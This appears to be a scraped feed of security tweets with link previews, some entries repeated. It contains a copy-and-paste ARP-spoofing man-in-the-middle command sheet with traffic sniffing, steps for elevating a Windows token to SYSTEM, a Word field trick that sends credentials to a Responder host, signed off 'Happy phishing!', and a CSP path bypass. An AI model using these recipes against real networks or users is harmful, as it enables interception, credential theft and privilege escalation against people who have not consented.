A huge lists of:
- Ethical Hacking Trainings
- CTF-s Platforms
- Pentesting Labs
- Web Training Apps (local installation)
- Bug Bounty Platforms
From: https://t.co/37le6OIHGh
- Ethical Hacking Trainings
- CTF-s Platforms
- Pentesting Labs
- Web Training Apps (local installation)
- Bug Bounty Platforms
From: https://t.co/37le6OIHGh
GitHub
GitHub - trimstray/the-book-of-secret-knowledge: A collection of inspiring lists, manuals, cheatsheets, blogs, hacks, one-liners…
A collection of inspiring lists, manuals, cheatsheets, blogs, hacks, one-liners, cli/web tools and more. - GitHub - trimstray/the-book-of-secret-knowledge: A collection of inspiring lists, manuals,...
MitM Copy&Paste Sheet 😎
#forwarding
sysctl -w net.ipv4.ip_forward=1
#redirect Traffic
arpspoof -i [Interface] -t [tgtIP] [RouterIP]
arpspoof -i [Interface] -t [RouterIP] [tgtIP]
#sniff pictures
driftnet -i [Interface]
#sniff URLs
urlsnarf -i [Interface]
#forwarding
sysctl -w net.ipv4.ip_forward=1
#redirect Traffic
arpspoof -i [Interface] -t [tgtIP] [RouterIP]
arpspoof -i [Interface] -t [RouterIP] [tgtIP]
#sniff pictures
driftnet -i [Interface]
#sniff URLs
urlsnarf -i [Interface]
Windows Token Privilege to "nt authority\system"
- Enable SE_DEBUG_NAME(debugprivileges) on the current process.
- Get a SYSTEM user token.
- Duplicate it to a Primary Token, so it can be passed to CreateProcess.
- Now we have duplicated the token, we can close the orginal.
- Enable SE_ASSIGNPRIMARYTOKEN_NAME and SE_INCREASE_QUOTA_NAME, these are both needed to start a process with a token.
- Enable SE_IMPERSONATE_NAME, so that we can impersonate the SYSTEM token.
- Start the process with the token.
- Clean up, revert back to self and close the handles
[Tool] Tokenvator3.5.exe
https://t.co/j8LOsvoZBH
- Enable SE_DEBUG_NAME(debugprivileges) on the current process.
- Get a SYSTEM user token.
- Duplicate it to a Primary Token, so it can be passed to CreateProcess.
- Now we have duplicated the token, we can close the orginal.
- Enable SE_ASSIGNPRIMARYTOKEN_NAME and SE_INCREASE_QUOTA_NAME, these are both needed to start a process with a token.
- Enable SE_IMPERSONATE_NAME, so that we can impersonate the SYSTEM token.
- Start the process with the token.
- Clean up, revert back to self and close the handles
[Tool] Tokenvator3.5.exe
https://t.co/j8LOsvoZBH
GitHub
0xbadjuju/Tokenvator
A tool to elevate privilege with Windows Tokens. Contribute to 0xbadjuju/Tokenvator development by creating an account on GitHub.
Submitted this to MSRC, won't patch, it's a "feature"; Open Word -> CTRL + F9 -> IMPORT "\\\\Responder-IP\\1.jpg" -> right click and select "Edit Field" -> tick "Data not stored in document" -> save & close. Open the document -> free credentials :) Happy phishing!
Persistence: “the continued or prolonged existence of something”
Part 1: https://t.co/pKk9BQoRUI
Part 2: https://t.co/XkwrKgPWqm
Part 3: https://t.co/V7xIaQVkAW
Part 1: https://t.co/pKk9BQoRUI
Part 2: https://t.co/XkwrKgPWqm
Part 3: https://t.co/V7xIaQVkAW
www.mdsec.co.uk
Persistence: “the continued or prolonged existence of something”: Part 1 – Microsoft Office – MDSec
If CSP policy points to a dir and you use %2f to encode "/", it is still considered to be inside the dir. All browsers seem to agree on that.
This leads to a possible bypass, by using "%2f..%2f" if server decodes it, example: https://t.co/Dl9hkKtlQc
This leads to a possible bypass, by using "%2f..%2f" if server decodes it, example: https://t.co/Dl9hkKtlQc
Jsbin
JS Bin
A live pastebin for HTML, CSS & JavaScript and a range of processors, including SCSS, CoffeeScript, Jade and more...